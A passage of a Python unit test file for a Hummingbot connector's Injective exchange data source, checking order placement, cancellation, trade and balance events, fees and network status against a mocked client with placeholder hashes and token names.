hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_api_data_source import (\n InjectiveAPIDataSource,\n)\nfrom hummingbot.connector.gateway.common_types import CancelOrderResult, PlaceOrderResult\nfrom hummingbot.connector.gateway.gateway_in_flight_order import GatewayInFlightOrder\nfrom hummingbot.connector.gateway.gateway_order_tracker import GatewayOrderTracker\nfrom hummingbot.connector.trading_rule import TradingRule\nfrom hummingbot.connector.utils import combine_to_hb_trading_pair\nfrom hummingbot.core.data_type.common import OrderType, TradeType\nfrom hummingbot.core.data_type.in_flight_order import OrderState, OrderUpdate, TradeUpdate\nfrom hummingbot.core.data_type.order_book_message import OrderBookMessage\nfrom hummingbot.core.data_type.trade_fee import (\n AddedToCostTradeFee,\n DeductedFromReturnsTradeFee,\n MakerTakerExchangeFeeRates,\n TokenAmount,\n)\nfrom hummingbot.core.event.event_logger import EventLogger\nfrom hummingbot.core.event.events import AccountEvent, BalanceUpdateEvent, MarketEvent, OrderBookDataSourceEvent\nfrom hummingbot.core.network_iterator import NetworkStatus\n\n\nclass MockExchange(ExchangeBase):\n pass\n\n\nclass InjectiveAPIDataSourceTest(unittest.TestCase):\n base: str\n quote: str\n trading_pair: str\n sub_account_id: str\n db_path: Path\n http_player: HttpPlayer\n patch_stack: ExitStack\n\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n cls.base = \"COIN\"\n cls.quote = \"ALPHA\"\n cls.trading_pair = combine_to_hb_trading_pair(base=cls.base, quote=cls.quote)\n cls.inj_trading_pair = combine_to_hb_trading_pair(base=\"INJ\", quote=cls.quote)\n cls.sub_account_id = \"0xc7287236f64484b476cfbec0fd21bc49d85f8850c8885665003928a122041e18\" # noqa: mock\n\n def setUp(self) -> None:\n super().setUp()\n self.initial_timestamp = 1669100347689\n self.injective_async_client_mock = InjectiveClientMock(\n initial_timestamp=self.initial_timestamp,\n sub_account_id=self.sub_account_id,\n base=self.base,\n quote=self.quote,\n )\n self.injective_async_client_mock.start()\n\n client_config_map = ClientConfigAdapter(hb_config=ClientConfigMap())\n\n self.connector = MockExchange(client_config_map=ClientConfigAdapter(ClientConfigMap()))\n self.tracker = GatewayOrderTracker(connector=self.connector)\n connector_spec = {\n \"chain\": \"injective\",\n \"network\": \"mainnet\",\n \"wallet_address\": self.sub_account_id\n }\n self.data_source = InjectiveAPIDataSource(\n trading_pairs=[self.trading_pair],\n connector_spec=connector_spec,\n client_config_map=client_config_map,\n )\n self.data_source.gateway_order_tracker = self.tracker\n\n self.trades_logger = EventLogger()\n self.order_updates_logger = EventLogger()\n self.trade_updates_logger = EventLogger()\n self.snapshots_logger = EventLogger()\n self.balance_logger = EventLogger()\n\n self.data_source.add_listener(event_tag=OrderBookDataSourceEvent.TRADE_EVENT, listener=self.trades_logger)\n self.data_source.add_listener(event_tag=MarketEvent.OrderUpdate, listener=self.order_updates_logger)\n self.data_source.add_listener(event_tag=MarketEvent.TradeUpdate, listener=self.trade_updates_logger)\n self.data_source.add_listener(event_tag=OrderBookDataSourceEvent.SNAPSHOT_EVENT, listener=self.snapshots_logger)\n self.data_source.add_listener(event_tag=AccountEvent.BalanceEvent, listener=self.balance_logger)\n\n self.async_run_with_timeout(coro=self.data_source.start())\n\n @staticmethod\n def async_run_with_timeout(coro: Awaitable, timeout: float = 1):\n ret = asyncio.get_event_loop().run_until_complete(asyncio.wait_for(coro, timeout))\n return ret\n\n def tearDown(self) -> None:\n self.injective_async_client_mock.stop()\n self.async_run_with_timeout(coro=self.data_source.stop())\n super().tearDown()\n\n def test_place_order(self):\n expected_exchange_order_id = \"someEOID\"\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n self.injective_async_client_mock.configure_place_order_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n exchange_order_id=expected_exchange_order_id,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n size=Decimal(\"2\"),\n )\n order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n )\n exchange_order_id, misc_updates = self.async_run_with_timeout(coro=self.data_source.place_order(order=order))\n\n self.assertEqual(expected_exchange_order_id, exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, misc_updates)\n\n def test_batch_order_create(self):\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n buy_expected_exchange_order_id = (\n \"0x7df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc8\" # noqa: mock\n )\n sell_expected_exchange_order_id = (\n \"0x8df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc9\" # noqa: mock\n )\n buy_order_to_create = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancelCreate\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n exchange_order_id=buy_expected_exchange_order_id,\n )\n sell_order_to_create = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancelCreate\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"11\"),\n amount=Decimal(\"3\"),\n exchange_order_id=sell_expected_exchange_order_id,\n )\n orders_to_create = [buy_order_to_create, sell_order_to_create]\n self.injective_async_client_mock.configure_batch_order_create_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n created_orders=orders_to_create,\n )\n\n result: List[PlaceOrderResult] = self.async_run_with_timeout(\n coro=self.data_source.batch_order_create(orders_to_create=orders_to_create)\n )\n\n self.assertEqual(2, len(result))\n self.assertEqual(buy_expected_exchange_order_id, result[0].exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, result[0].misc_updates)\n self.assertEqual(sell_expected_exchange_order_id, result[1].exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, result[1].misc_updates)\n\n def test_cancel_order(self):\n creation_transaction_hash = \"0x8f6g4552091a69125d5dfcb7b8c2659029395ceg\" # noqa: mock\n expected_client_order_id = \"someCOID\"\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n expected_exchange_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n order = GatewayInFlightOrder(\n client_order_id=expected_client_order_id,\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash,\n )\n order.order_fills[creation_transaction_hash] = None # to prevent requesting creation transaction\n self.injective_async_client_mock.configure_cancel_order_response(\n timestamp=self.initial_timestamp, transaction_hash=expected_transaction_hash\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response_for_in_flight_order(\n timestamp=self.initial_timestamp,\n in_flight_order=order,\n order_hash=expected_exchange_order_id,\n is_canceled=True,\n )\n cancelation_success, misc_updates = self.async_run_with_timeout(coro=self.data_source.cancel_order(order=order))\n\n self.assertTrue(cancelation_success)\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, misc_updates)\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n def test_batch_order_cancel(self):\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n buy_expected_exchange_order_id = (\n \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n )\n sell_expected_exchange_order_id = (\n \"0x7df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc8\" # noqa: mock\n )\n creation_transaction_hash_for_cancel = \"0x8f6g4552091a69125d5dfcb7b8c2659029395ceg\" # noqa: mock\n buy_order_to_cancel = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancel\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=buy_expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash_for_cancel,\n )\n sell_order_to_cancel = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancel\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n price=Decimal(\"11\"),\n amount=Decimal(\"2\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=sell_expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash_for_cancel,\n )\n self.data_source.gateway_order_tracker.start_tracking_order(order=buy_order_to_cancel)\n self.data_source.gateway_order_tracker.start_tracking_order(order=sell_order_to_cancel)\n orders_to_cancel = [buy_order_to_cancel, sell_order_to_cancel]\n self.injective_async_client_mock.configure_batch_order_cancel_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n canceled_orders=orders_to_cancel,\n )\n\n result: List[CancelOrderResult] = self.async_run_with_timeout(\n coro=self.data_source.batch_order_cancel(orders_to_cancel=orders_to_cancel)\n )\n\n self.assertEqual(2, len(result))\n self.assertEqual(buy_order_to_cancel.client_order_id, result[0].client_order_id)\n self.assertIsNone(result[0].exception) # i.e. success\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, result[0].misc_updates)\n self.assertEqual(sell_order_to_cancel.client_order_id, result[1].client_order_id)\n self.assertIsNone(result[1].exception) # i.e. success\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, result[1].misc_updates)\n\n def test_get_trading_rules(self):\n trading_rules = self.async_run_with_timeout(coro=self.data_source.get_trading_rules())\n\n self.assertEqual(2, len(trading_rules))\n self.assertIn(self.trading_pair, trading_rules)\n self.assertIn(self.inj_trading_pair, trading_rules)\n\n trading_rule: TradingRule = trading_rules[self.trading_pair]\n\n self.assertEqual(self.trading_pair, trading_rule.trading_pair)\n self.assertEqual(Decimal(\"0.00001\"), trading_rule.min_price_increment)\n self.assertEqual(Decimal(\"0.00001\"), trading_rule.min_quote_amount_increment)\n self.assertEqual(Decimal(\"0.001\"), trading_rule.min_base_amount_increment)\n\n def test_get_symbol_map(self):\n symbol_map = self.async_run_with_timeout(coro=self.data_source.get_symbol_map())\n\n self.assertIsInstance(symbol_map, bidict)\n self.assertEqual(2, len(symbol_map))\n self.assertIn(self.injective_async_client_mock.market_id, symbol_map)\n self.assertIn(self.trading_pair, symbol_map.inverse)\n self.assertIn(self.inj_trading_pair, symbol_map.inverse)\n\n def test_get_last_traded_price(self):\n target_price = Decimal(\"1.157\")\n target_maker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.0001157\"))])\n target_taker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.00024\"))])\n self.injective_async_client_mock.configure_spot_trades_response_to_request_without_exchange_order_id(\n timestamp=self.initial_timestamp,\n price=target_price,\n size=Decimal(\"0.001\"),\n maker_fee=target_maker_fee,\n taker_fee=target_taker_fee,\n )\n price = self.async_run_with_timeout(coro=self.data_source.get_last_traded_price(trading_pair=self.trading_pair))\n\n self.assertEqual(target_price, price)\n\n def test_get_order_book_snapshot(self):\n self.injective_async_client_mock.configure_orderbook_snapshot(\n timestamp=self.initial_timestamp, bids=[(9, 1), (8, 2)], asks=[(11, 3)]\n )\n order_book_snapshot: OrderBookMessage = self.async_run_with_timeout(\n coro=self.data_source.get_order_book_snapshot(trading_pair=self.trading_pair)\n )\n\n self.assertEqual(self.initial_timestamp, order_book_snapshot.timestamp)\n self.assertEqual(2, len(order_book_snapshot.bids))\n self.assertEqual(9, order_book_snapshot.bids[0].price)\n self.assertEqual(1, order_book_snapshot.bids[0].amount)\n self.assertEqual(1, len(order_book_snapshot.asks))\n self.assertEqual(11, order_book_snapshot.asks[0].price)\n self.assertEqual(3, order_book_snapshot.asks[0].amount)\n\n def test_delivers_trade_events(self):\n target_price = Decimal(\"1.157\")\n target_size = Decimal(\"0.001\")\n target_maker_fee = DeductedFromReturnsTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.0001157\"))])\n target_taker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.00024\"))])\n target_exchange_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n target_trade_id = \"19889401_someTradeId\"\n self.injective_async_client_mock.configure_trade_stream_event(\n timestamp=self.initial_timestamp,\n price=target_price,\n size=target_size,\n maker_fee=target_maker_fee,\n taker_fee=target_taker_fee,\n exchange_order_id=target_exchange_order_id,\n taker_trade_id=target_trade_id,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.trades_logger.event_log))\n self.assertEqual(2, len(self.trade_updates_logger.event_log))\n\n first_trade_event: OrderBookMessage = self.trades_logger.event_log[0]\n\n self.assertEqual(self.initial_timestamp, first_trade_event.timestamp)\n self.assertEqual(self.trading_pair, first_trade_event.content[\"trading_pair\"])\n self.assertEqual(TradeType.SELL, first_trade_event.content[\"trade_type\"])\n self.assertEqual(target_price, first_trade_event.content[\"price\"])\n self.assertEqual(target_size, first_trade_event.content[\"amount\"])\n self.assertFalse(first_trade_event.content[\"is_taker\"])\n\n second_trade_event: OrderBookMessage = self.trades_logger.event_log[1]\n\n self.assertEqual(self.initial_timestamp, second_trade_event.timestamp)\n self.assertEqual(self.trading_pair, second_trade_event.content[\"trading_pair\"])\n self.assertEqual(TradeType.BUY, second_trade_event.content[\"trade_type\"])\n self.assertEqual(target_price, second_trade_event.content[\"price\"])\n self.assertEqual(target_size, second_trade_event.content[\"amount\"])\n self.assertTrue(second_trade_event.content[\"is_taker\"])\n\n first_trade_update: TradeUpdate = self.trade_updates_logger.event_log[0]\n\n self.assertEqual(self.trading_pair, first_trade_update.trading_pair)\n self.assertEqual(self.initial_timestamp, first_trade_update.fill_timestamp)\n self.assertEqual(target_price, first_trade_update.fill_price)\n self.assertEqual(target_size, first_trade_update.fill_base_amount)\n self.assertEqual(target_price * target_size, first_trade_update.fill_quote_amount)\n self.assertEqual(target_maker_fee, first_trade_update.fee)\n\n second_order_event: TradeUpdate = self.trade_updates_logger.event_log[1]\n\n self.assertEqual(target_trade_id, second_order_event.trade_id)\n self.assertEqual(target_exchange_order_id, second_order_event.exchange_order_id)\n self.assertEqual(self.trading_pair, second_order_event.trading_pair)\n self.assertEqual(self.initial_timestamp, second_order_event.fill_timestamp)\n self.assertEqual(target_price, second_order_event.fill_price)\n self.assertEqual(target_size, second_order_event.fill_base_amount)\n self.assertEqual(target_price * target_size, second_order_event.fill_quote_amount)\n self.assertEqual(target_taker_fee, second_order_event.fee)\n\n def test_delivers_order_created_events(self):\n target_order_id = \"someOrderHash\"\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"buy_po\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[0]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.OPEN, order_event.new_state)\n\n target_order_id = \"anotherOrderHash\"\n target_price = Decimal(\"50\")\n target_size = Decimal(\"1\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOtherOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"sell\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.OPEN, order_event.new_state)\n\n def test_delivers_order_fully_filled_events(self):\n target_order_id = \"someOrderHash\"\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"filled\",\n execution_type=\"limit\",\n order_type=\"buy\",\n price=target_price,\n size=target_size,\n filled_size=target_size,\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.FILLED, order_event.new_state)\n\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"filled\",\n execution_type=\"limit\",\n order_type=\"sell_po\",\n price=target_price,\n size=target_size,\n filled_size=target_size,\n direction=\"sell\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(4, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[3]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.FILLED, order_event.new_state)\n\n def test_delivers_order_canceled_events(self):\n target_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"canceled\",\n execution_type=\"limit\",\n order_type=\"buy\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.CANCELED, order_event.new_state)\n\n def test_delivers_order_book_snapshots(self):\n self.injective_async_client_mock.configure_orderbook_snapshot_stream_event(\n timestamp=self.initial_timestamp, bids=[(9, 1), (8, 2)], asks=[(11, 3)]\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.snapshots_logger.event_log))\n\n snapshot_event: OrderBookMessage = self.snapshots_logger.event_log[0]\n\n self.assertEqual(self.initial_timestamp, snapshot_event.timestamp)\n self.assertEqual(2, len(snapshot_event.bids))\n self.assertEqual(9, snapshot_event.bids[0].price)\n self.assertEqual(1, snapshot_event.bids[0].amount)\n self.assertEqual(1, len(snapshot_event.asks))\n self.assertEqual(11, snapshot_event.asks[0].price)\n self.assertEqual(3, snapshot_event.asks[0].amount)\n\n def test_get_account_balances(self):\n base_bank_balance = Decimal(\"75\")\n base_total_balance = Decimal(\"10\")\n base_available_balance = Decimal(\"9\")\n quote_total_balance = Decimal(\"200\")\n quote_available_balance = Decimal(\"150\")\n self.injective_async_client_mock.configure_get_account_balances_response(\n base_bank_balance=base_bank_balance,\n quote_bank_balance=Decimal(\"0\"),\n base_total_balance=base_total_balance,\n base_available_balance=base_available_balance,\n quote_total_balance=quote_total_balance,\n quote_available_balance=quote_available_balance,\n )\n\n subaccount_balances = self.async_run_with_timeout(coro=self.data_source.get_account_balances())\n\n self.assertEqual(base_total_balance, subaccount_balances[self.base][\"total_balance\"])\n self.assertEqual(base_available_balance, subaccount_balances[self.base][\"available_balance\"])\n self.assertEqual(quote_total_balance, subaccount_balances[self.quote][\"total_balance\"])\n self.assertEqual(quote_available_balance, subaccount_balances[self.quote][\"available_balance\"])\n\n def test_get_order_status_update_success(self):\n creation_transaction_hash = \"0x7cb2eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2g81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"booked\",\n execution_type=\"market\" if in_flight_order.order_type == OrderType.MARKET else \"limit\",\n order_type=(\n in_flight_order.trade_type.name.lower()\n + (\"_po\" if in_flight_order.order_type == OrderType.LIMIT_MAKER else \"\")\n ),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n status_update: OrderUpdate = self.async_run_with_timeout(\n coro=self.data_source.get_order_status_update(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.OPEN, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n self.assertIn(\"creation_transaction_hash\", status_update.misc_updates)\n self.assertEqual(creation_transaction_hash, status_update.misc_updates[\"creation_transaction_hash\"])\n\n def test_get_all_order_fills_no_fills(self):\n target_order_id = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n creation_transaction_hash = \"0x7cb2eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2g81d\" # noqa: mock\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=Decimal(\"10\"),\n size=Decimal(\"2\"),\n filled_size=Decimal(\"0\"),\n direction=\"sell\",\n )\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someOrderId\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp - 10,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n exchange_order_id=target_order_id,\n )\n\n trade_updates = self.async_run_with_timeout(\n coro=self.data_source.get_all_order_fills(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(0, len(trade_updates))\n\n def test_get_all_order_fills(self):\n target_client_order_id = \"someOrderId\"\n target_exchange_order_id = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n target_trade_id = \"someTradeHash\"\n target_price = Decimal(\"10\")\n target_size = Decimal(\"2\")\n target_trade_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.01\"))])\n target_partial_fill_size = target_size / 2\n target_fill_ts = self.initial_timestamp + 10\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp,\n order_hash=target_exchange_order_id,\n state=\"partial_filled\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=target_price,\n size=target_size,\n filled_size=target_partial_fill_size,\n direction=\"sell\",\n )\n self.injective_async_client_mock.configure_trades_response_with_exchange_order_id(\n timestamp=target_fill_ts,\n exchange_order_id=target_exchange_order_id,\n price=target_price,\n size=target_partial_fill_size,\n fee=target_trade_fee,\n trade_id=target_trade_id,\n )\n in_flight_order = GatewayInFlightOrder(\n client_order_id=target_client_order_id,\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp - 10,\n price=target_price,\n amount=target_size,\n exchange_order_id=target_exchange_order_id,\n )\n\n trade_updates: List[TradeUpdate] = self.async_run_with_timeout(\n coro=self.data_source.get_all_order_fills(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(1, len(trade_updates))\n\n trade_update = trade_updates[0]\n\n self.assertEqual(target_trade_id, trade_update.trade_id)\n self.assertEqual(target_client_order_id, trade_update.client_order_id)\n self.assertEqual(target_exchange_order_id, trade_update.exchange_order_id)\n self.assertEqual(self.trading_pair, trade_update.trading_pair)\n self.assertEqual(target_fill_ts, trade_update.fill_timestamp)\n self.assertEqual(target_price, trade_update.fill_price)\n self.assertEqual(target_partial_fill_size, trade_update.fill_base_amount)\n self.assertEqual(target_partial_fill_size * target_price, trade_update.fill_quote_amount)\n self.assertEqual(target_trade_fee, trade_update.fee)\n\n def test_check_network_status(self):\n self.injective_async_client_mock.configure_check_network_failure()\n\n status = self.async_run_with_timeout(coro=self.data_source.check_network_status())\n\n self.assertEqual(NetworkStatus.NOT_CONNECTED, status)\n\n self.injective_async_client_mock.configure_check_network_success()\n\n status = self.async_run_with_timeout(coro=self.data_source.check_network_status())\n\n self.assertEqual(NetworkStatus.CONNECTED, status)\n\n def test_get_trading_fees(self):\n all_trading_fees = self.async_run_with_timeout(coro=self.data_source.get_trading_fees())\n\n self.assertIn(self.trading_pair, all_trading_fees)\n\n pair_trading_fees: MakerTakerExchangeFeeRates = all_trading_fees[self.trading_pair]\n\n service_provider_rebate = Decimal(\"1\") - self.injective_async_client_mock.service_provider_fee\n expected_maker_fee = self.injective_async_client_mock.maker_fee_rate * service_provider_rebate\n expected_taker_fee = self.injective_async_client_mock.taker_fee_rate * service_provider_rebate\n self.assertEqual(expected_maker_fee, pair_trading_fees.maker)\n self.assertEqual(expected_taker_fee, pair_trading_fees.taker)\n\n def test_delivers_balance_events(self):\n target_total_balance = Decimal(\"20\")\n target_available_balance = Decimal(\"19\")\n self.injective_async_client_mock.configure_account_quote_balance_stream_event(\n timestamp=self.initial_timestamp,\n total_balance=target_total_balance,\n available_balance=target_available_balance,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.balance_logger.event_log))\n\n balance_event: BalanceUpdateEvent = self.balance_logger.event_log[0]\n\n self.assertEqual(self.quote, balance_event.asset_name)\n self.assertEqual(target_total_balance, balance_event.total_balance)\n self.assertEqual(target_available_balance, balance_event.available_balance)\n\n def test_parses_transaction_event_for_order_creation_success(self):\n creation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n self.tracker.start_tracking_order(order=in_flight_order)\n self.injective_async_client_mock.configure_creation_transaction_stream_event(\n timestamp=self.initial_timestamp + 1, transaction_hash=creation_transaction_hash\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"booked\",\n execution_type=\"market\" if in_flight_order.order_type == OrderType.MARKET else 